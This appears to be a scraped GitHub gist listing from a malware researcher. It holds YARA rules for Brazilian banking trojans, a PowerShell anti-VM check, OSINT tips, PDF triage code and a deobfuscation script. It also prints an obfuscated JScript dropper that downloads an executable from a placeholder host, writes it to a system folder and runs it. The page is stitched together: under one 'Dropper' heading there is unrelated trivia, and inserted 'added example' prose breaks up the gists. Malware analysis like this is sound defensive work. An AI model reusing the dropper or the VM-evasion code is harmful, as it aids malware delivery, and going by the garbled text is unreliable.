teixeira0xfffff
@teixeira0xfffff
teixeira0xfffff / 09328irpf_restiruir_.msi
Created May 18, 2019 14:41
Brazilian .MSI banking trojan
/*
YARA Rule Set
Author: Ialle Teixeira
Date: 2019-05-18
Identifier: MSI banking trojan
*/
rule sig_09328irpf_restiruir_ {
meta:
description = "reported by @DefesaDigital - file 09328irpf_restiruir_.msi"
@teixeira0xfffff
teixeira0xfffff / Dil_Peticao_99845650.lnk
Created May 18, 2019 15:14
Brazilian .LNK banking trojan
/*
YARA Rule Set
Author: Ialle Teixeira
Date: 2019-05-18
Identifier: .LNK banking trojan
*/
rule Dil_Peticao_99845650 {
meta:
description = "reported by @DefesaDigital - file Dil_Peticao_99845650.lnk"
<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003" >
<Target Name="Hello" >
<!-- Call ANY .NET API -->
<!--
Author: Casey Smith, Twitter: @subTee
License: BSD 3-Clause
@teixeira0xfffff
teixeira0xfffff / resources.bin
Created June 2, 2019 22:52
Redteam/Pentesting/Hacking/Cybersecurity/OSINT Resources
++++++ Basic knowledge requirements for cybersecurity and hacking ++++++
These are the basic competencies expected (and tested for during the first in-person interview) by a large, very visible InfoSec company. I think it is a good base competency list for anyone looking to get into an InfoSec career (with a specialization, plus some programming/scripting ability) or to learn cybersecurity/hacking as a hobby:
Networking:
- Good understanding of the OSI layer model / understanding of the communication flow through each layer / good understanding of the functions of each layer / understanding of the major protocols in each layer
- In-depth understanding of Layer 3 and Layer 4 protocols: IP and ICMP (layer 3), TCP and UDP (layer 4)
Overview of the TCP/IP layer model:
- ARP / understanding of the client and server communication model / ports that common services run on / ephemeral ports vs. well-known ports
Understanding of major (everyday Layer 7) services/protocols:
- DNS
- DHCP
- HTTP: HTTP header fields, HTTP status codes, How HTTP mainta
@teixeira0xfffff
teixeira0xfffff / MSAcpi_ThermalZoneTemperature.ps1
Created June 18, 2019 05:36
Anti-VM Techniques with MSAcpi_ThermalZoneTemperature
function Get-AntiVMwithTemperature {
    # MSAcpi_ThermalZoneTemperature is backed by ACPI thermal zones that most hypervisors do not expose,
    # so on a VM the query typically fails with "Not supported"; that failure is the anti-VM signal.
    try {
        $t = Get-WmiObject MSAcpi_ThermalZoneTemperature -Namespace "root/wmi" -ErrorAction Stop | Select-Object -First 1
    } catch {
        return "No thermal zone reading (" + $_.Exception.Message.Trim() + "): probably a virtual machine"
    }
    $valorTempKelvin = $t.CurrentTemperature / 10          # WMI reports the value in tenths of a Kelvin
    $valorTempCelsius = $valorTempKelvin - 273.15
    $valorTempFahrenheit = (9/5) * $valorTempCelsius + 32
    return $valorTempCelsius.ToString() + " C : " + $valorTempFahrenheit.ToString() + " F : " + $valorTempKelvin.ToString() + " K"
}
@teixeira0xfffff
teixeira0xfffff / gist:2ed9152acea792be7dffbf0aa0191b29
Last active July 31, 2019 10:55
Argus/TCPDump/Tshark Date real time
~ apt install tcpdump
~ apt install argus-client
~ tcpdump -nn -s0 -r Yourdump.pcap -w - | argus -r - -AZJmR -w - | ra -n -Zb -L10 -r - -s +dur +synack +ackdat +swin +dwin +rate +load +tcprtt +loss +runtime +retrans +sgap +dgap - tcp | xargs -d$'\n' -L1 sh -c 'date "+%d.%m.%Y %T $0"'
# Each ra line is appended to date's format string, so the stamp is the time the line was processed
# (and any % in the line would be expanded by date); for the flow's own capture time add +stime to the -s field list.
@teixeira0xfffff
teixeira0xfffff / twitterOSINT
Last active September 12, 2019 10:16
Twitter advanced search for OSINT purpose
▪️ containing both “watching” and “now” (this is the default operator): **watching now**
▪️ containing the exact phrase “happy hour”: **“happy hour”**
▪️ containing either “love” or “hate” (or both): **love OR hate**
▪️ containing “beer” but not “root”: **beer -root**
▪️ containing the hashtag **“haiku”**
@teixeira0xfffff
teixeira0xfffff / gist:6ccbdbef95da08dcf2e213b99e4b9533
Last active September 1, 2021 21:16
Analyzing Malicious Documents (PDF file)
Name: SCAN_0502_FA2C8.pdf
MD5: dfc20138456eb478673e046754536c76
SHA-1: bbc5dbdf9bbf844854dc52f47b03b88ebac5bc17
SHA-256: a6b7a89a073be96dcfaac63ef0093e3186171995df90c9c3f966083338e858e9
Vhash: 913a9ca88f467c85a8c6e005b9321caa5
SSDEEP: 384:fC3s7nDeeTykyBmtnbFOB444uBAzLzobLTbL4wu:fC3sO+AAxOBhfAzAbPb8wu
File type: PDF
Magic: PDF document, version 1.4
File size: 16.93 KB (17337 bytes)
https://www.virustotal.com/gui/file/a6b7a89a073be96dcfaac63ef0093e3186171995df90c9c3f966083338e858e9/details
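The identifiers above are what a first pass records; the next step is usually a look at the PDF's dictionary names. Below is an added example (my code, not the gist's) that computes the same identifiers for a file and counts the names that mark active content, unescaping #xx sequences so a hidden /Java#53cript is still caught. The sample PDF inside it is constructed for the example and is not the SCAN_0502_FA2C8.pdf listed above; RISKY_NAMES is a subset of the keywords pdfid counts.

```python
import hashlib
import re

# Added example, not code from the gist: compute the identifiers listed above
# (hashes, size, header version) and count the PDF name objects that make a
# document worth a closer look, including names hidden with #xx hex escapes.

# Constructed sample, NOT the SCAN_0502_FA2C8.pdf from the gist: a minimal
# PDF whose catalog fires a JavaScript action on open. /Java#53cript is the
# hex-escaped form of /JavaScript (#53 == 'S'), used to dodge naive substring
# searches.
SAMPLE_PDF = (
    b"%PDF-1.4\n"
    b"1 0 obj << /Type /Catalog /Pages 2 0 R /OpenAction 3 0 R >> endobj\n"
    b"2 0 obj << /Type /Pages /Kids [] /Count 0 >> endobj\n"
    b"3 0 obj << /S /Java#53cript /JS (app.alert('hi')) >> endobj\n"
    b"trailer << /Root 1 0 R >>\n"
    b"%%EOF\n"
)

# Names that point at active content or embedded payloads (subset of pdfid's list).
RISKY_NAMES = ("/JavaScript", "/JS", "/OpenAction", "/AA", "/Launch",
               "/EmbeddedFile", "/RichMedia", "/ObjStm")

# A PDF name token: '/' followed by regular characters (no whitespace or delimiters).
_NAME_TOKEN = re.compile(rb"/[^\s()<>\[\]{}/%]+")


def identifiers(data: bytes) -> dict:
    """MD5, SHA-1, SHA-256, size and header version, as in the listing above."""
    m = re.match(rb"%PDF-(\d\.\d)", data)
    return {
        "md5": hashlib.md5(data).hexdigest(),
        "sha1": hashlib.sha1(data).hexdigest(),
        "sha256": hashlib.sha256(data).hexdigest(),
        "size": len(data),
        "pdf_version": m.group(1).decode() if m else None,
    }


def _decode_name(raw: bytes) -> str:
    """Undo #xx escapes so /Java#53cript compares equal to /JavaScript."""
    return re.sub(rb"#([0-9A-Fa-f]{2})",
                  lambda mm: bytes([int(mm.group(1), 16)]), raw).decode("latin-1")


def risky_name_counts(data: bytes) -> dict:
    """Count each risky name, matching on the unescaped form."""
    counts = {name: 0 for name in RISKY_NAMES}
    for raw in _NAME_TOKEN.findall(data):
        name = _decode_name(raw)
        if name in counts:
            counts[name] += 1
    return counts


def triage(data: bytes) -> dict:
    """Identifiers plus the non-zero risky-name counts; suspicious if any name was seen."""
    report = identifiers(data)
    report["risky_names"] = {k: v for k, v in risky_name_counts(data).items() if v}
    report["suspicious"] = bool(report["risky_names"])
    return report


if __name__ == "__main__":
    for key, value in triage(SAMPLE_PDF).items():
        print(f"{key}: {value}")
```

Run it against a real sample with `triage(open(path, "rb").read())`; a non-zero /OpenAction or /AA count next to /JavaScript or /Launch is the usual reason to pull the object out and look at the script itself.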
@teixeira0xfffff
teixeira0xfffff / js
Created January 5, 2020 10:47
_850e.js Dropper
/***************************************************************************/
/* */
/* This obfuscated code was created by Javascript Obfuscator Free Version.*/
/* Javascript Obfuscator Free Version can be downloaded here */
/* http://javascriptobfuscator.com */
/* */
/***************************************************************************/
// String table: every literal the dropper needs, referenced by index so no string appears at its point of use
var _$_850e = ["http://yourmalware.com/dm.exe", "WScript.Shell", "CreateObject", "Scripting.FileSystemObject", "GetSpecialFolder", "\\0Whst.exe", "MSXML2.XMLHTTP", "GET", "open", "send", "Status", "FileExists", "DeleteFile", "ADODB.Stream", "Open", "Type", "ResponseBody", "Write", "Position", "SaveToFile", "Close", "Run"];
var url = _$_850e[0];                               // "http://yourmalware.com/dm.exe" (placeholder payload URL)
var WshShell = WScript[_$_850e[2]](_$_850e[1]);     // WScript.CreateObject("WScript.Shell")
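The _$_850e array is the whole dropper in outline: every string it needs, with the code referencing entries by index so no literal appears where it is used. Reading the table in order already gives the flow (fetch with MSXML2.XMLHTTP, write the ResponseBody through ADODB.Stream into GetSpecialFolder()\0Whst.exe, Run). The following is an added example, not the gist author's code, that resolves the indirection back into readable source; it uses the three visible dropper lines above as its sample input, and the ProgID list it extracts is the set of COM objects the dropper instantiates.

```python
import json
import re

# Added example, not code from the gist: undo the array-indirection
# obfuscation used by _850e.js by substituting table entries back in.

# The visible lines of the dropper from the gist, used as sample input.
SAMPLE_JS = r'''var _$_850e = ["http://yourmalware.com/dm.exe", "WScript.Shell", "CreateObject", "Scripting.FileSystemObject", "GetSpecialFolder", "\\0Whst.exe", "MSXML2.XMLHTTP", "GET", "open", "send", "Status", "FileExists", "DeleteFile", "ADODB.Stream", "Open", "Type", "ResponseBody", "Write", "Position", "SaveToFile", "Close", "Run"];
var url = _$_850e[0];
var WshShell = WScript[_$_850e[2]](_$_850e[1]);'''

_TABLE_DECL = re.compile(r'var\s+([\w$]+)\s*=\s*\[(.*?)\];', re.S)
_STRING_LIT = re.compile(r'"((?:\\.|[^"\\])*)"')
_ESCAPES = {"n": "\n", "t": "\t", "r": "\r", "0": "\0"}


def _unescape(s: str) -> str:
    """Minimal JS string unescaping (backslash, quote, n, t, r, 0)."""
    return re.sub(r'\\(.)', lambda m: _ESCAPES.get(m.group(1), m.group(1)), s)


def extract_string_table(js: str):
    """Return (table variable name, list of decoded strings)."""
    m = _TABLE_DECL.search(js)
    if not m:
        raise ValueError("no string table found")
    return m.group(1), [_unescape(s) for s in _STRING_LIT.findall(m.group(2))]


def deobfuscate(js: str) -> str:
    """Replace name[N] with the literal and obj["prop"] with obj.prop; drop the table."""
    name, table = extract_string_table(js)
    m = _TABLE_DECL.search(js)
    body = js[:m.start()] + js[m.end():]
    body = re.sub(re.escape(name) + r'\[(\d+)\]',
                  lambda mm: json.dumps(table[int(mm.group(1))]), body)
    # WScript["CreateObject"](...) reads better as WScript.CreateObject(...)
    body = re.sub(r'\["([A-Za-z_$][\w$]*)"\]', r'.\1', body)
    return body.strip()


def com_progids(table) -> list:
    """Table entries shaped like COM ProgIDs (Server.Class): the objects the dropper instantiates."""
    return [s for s in table
            if re.fullmatch(r'[A-Za-z][A-Za-z0-9]*\.[A-Za-z][A-Za-z0-9]*', s)]


if __name__ == "__main__":
    _, table = extract_string_table(SAMPLE_JS)
    print(deobfuscate(SAMPLE_JS))
    print("COM objects:", ", ".join(com_progids(table)))
```

The table name is taken from the first `var x = [...]` declaration, so the same script works on other samples from this obfuscator; anything that builds strings at runtime (concatenation, charCode tricks) is outside what this substitution handles.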
@teixeira0xfffff
teixeira0xfffff / js
Created January 5, 2020 10:51
WYwhQLPWQ.js Dropper
'... that the Ludington family included a teenage girl (statue pictured) whose night-long ride to alert the Continental Army of an imminent British attack has been compared to the ride of Paul Revere?... that actress Siobhan Finneran said she wanted her Downton Abbey character "flung off the roof of the Abbey?'
'... that red-headed pine sawfly larvae drag pine needles into the silken tubes in which they live?'
'... that theoretical physicist Deepak Dhar and Ramakrishna Ramaswamy solved the Abelian sandpile model of self-organized criticality with their Dhar-Ramaswamy model?'
'... that Seattles passenger-only ferries, blamed for beach erosion, were forced to slow down because of a class-action lawsuit?'
'... that Juana Bordas says her parents were uncomfortable with the idea of her leaving home to go to college due to the "crab syndrome"?'
'... that the Soviet Armys 7th Guards Tank Division was part of the Group of Soviet Forces in Germany for 43 years during the Cold War?'
'... that the call letters of radio